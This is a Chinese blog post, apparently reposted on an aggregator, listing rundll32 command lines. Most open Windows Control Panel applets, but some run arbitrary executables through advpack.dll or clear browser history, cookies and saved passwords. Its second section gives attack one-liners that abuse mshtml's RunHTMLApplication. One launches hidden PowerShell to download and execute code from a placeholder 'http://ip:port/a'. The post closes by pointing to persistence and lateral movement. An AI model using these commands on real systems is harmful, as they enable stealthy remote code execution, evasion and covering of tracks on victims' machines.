标签:exe cpl WINDOWS System32 dll 关于 rundll32
一.常规的dll调用 C:\WINDOWS\System32\rundll32 advpack.dll #12 C:\Users\xinxin\Desktop\ConsoleApplication1.exe //执行exe ps:rundll32 advpack.dll, #-4294967284 C:\Users\xinxin\Desktop\ConsoleApplication1.exe rundll32 advpack.dll RegisterOCX C:\Users\xinxin\Desktop\ConsoleApplication1.exe C:\WINDOWS\System32\rundll32.exe devmgr.dll DeviceManager_Execute //设备管理 C:\WINDOWS\System32\rundll32.exe keymgr.dll,PRShowSaveWizardExW //忘记密码 C:\WINDOWS\System32\rundll32.exe keymgr.dll,KRShowKeyMgr //已经存储的用户名和密码
C:\WINDOWS\System32\rundll32.exe newdev.dll,DeviceInternetSettingUi //设备安装设置
C:\WINDOWS\System32\rundll32.exe powrprof.dll,SetSuspendState //电脑休眠 C:\WINDOWS\System32\rundll32.exe Printui.dll,PrintUIEntry /? //打印机用户界面 C:\WINDOWS\System32\rundll32.exe pwlauncher.dll,ShowPortableWorkspaceLauncherConfigurationUX //windows to go选项 C:\WINDOWS\System32\rundll32.exe shdocvw.dll,DoOrganizeFavDlg //收藏夹 C:\WINDOWS\System32\rundll32.exe shwebsvc.dll AddNetPlaceRunDll //添加网络位置向导 C:\WINDOWS\System32\rundll32.exe tcpmonui.dll,LocalAddPortUI //tcp,端口打印机添加 C:\WINDOWS\System32\rundll32.exe user32.dll,LockWorkStation //锁屏 C:\WINDOWS\System32\rundll32.exe user32.dll,SwapMouseButton //鼠标左右键交换,很恶心 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 255 //清楚浏览器历史记录
C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351 //删除所有浏览历史和加载项历史 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 2 //删除 cookie 和网站数据 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 16834 //删除下载数据 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 16 //删除表单数据 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 32 //删除浏览器密码 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 8 //删除临时 Internet 文件和网站文件 C:\WINDOWS\System32\rundll32.exe sysdm.cpl,EditEnvironmentVariables //环境变量 C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL //控制面板 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL HotPlug.dll //删除硬件 C:\WINDOWS\System32\rundll32.exe Shell32.dll,Control_RunDLL input.dll,,{C07337D3-DB2C-4D0B-9A93-B722A6C106E2} //文本服务和输入语言 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL joy.cpl //游戏控制器 PS:当然,我们也可以直接使用control joy.cpl直接打开 也可以使用vbs文件(双击&&wscript //e:jscript joy.vbs),js文件(wscript //e:jscript joy.js)
也可以使用 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("cmd /c c:\\windows\\system32\\joy.cpl",0,true) C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL nusrmgr.cpl //控制面板->用户账户 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL wscui.cpl //安全和维护 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL NetSetup.cpl //配置无线路由器接入点 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl //浏览器属性 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL main.cpl @1 //键盘属性 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL main.cpl //鼠标属性 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL ncpa.cpl //网络连接 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl //ODBC数据库管理 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL Sysdm.cpl,,1 //系统属性,更改计算机名 C:\WINDOWS\System32\rundll32.exe Shell32.dll,Control_RunDLL cscui.dll,,0 //启用脱机文件 C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL access.cpl //轻松使用设置中心 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL srchadmin.dll //索引选项 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL tabletpc.cpl //启用平板的笔 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl //打开电源选项 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL Mmsys.cpl,,0 //声音设置 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0 //程序和功能 C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL firewall.cpl //打开防火墙 C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL desk.cpl //打开系统显示 C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL desk.cpl,,0 //桌面图标设置 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL Intl.cpl,,0 //区域,时间设置 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL C:\WINDOWS\System32\Speech\SpeechUX\sapi.cpl,,1 //语音文字转化 C:\WINDOWS\System32\rundll32.exe shell32.dll,Options_RunDLL 0 //文件资源管理器 C:\WINDOWS\System32\rundll32.exe shell32.dll,Options_RunDLL 2 //文件资源管理器选项 C:\WINDOWS\System32\rundll32.exe shell32.dll ShellAbout //关于电脑本机 C:\WINDOWS\System32\rundll32.exe shell32.dll SHHelpShortcuts_RunDLL AddPrinter //添加打印机 C:\WINDOWS\System32\rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder //字体 C:\WINDOWS\System32\rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL Connect //映射网络驱动器 C:\WINDOWS\System32\rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder //打印机列表 二.文件执行 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://ip:port/a'))") //执行powershell rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("cmd /c c:\\windows\\system32\\joy.cpl",0,true) //执行我们的cpl文件 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=javascript)"+(new%20ActiveXObject("WScript.Shell")).Run("ConsoleApplication1.exe")+"\74/script)") //执行我们的exe文件 当然,还有我们的-localserver以及-sta参数可以让我们更方便的权限维持或者横向移动
标签:exe,cpl,WINDOWS,System32,dll,关于,rundll32 来源: https://www.cnblogs.com/xinxin999/p/15874533.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。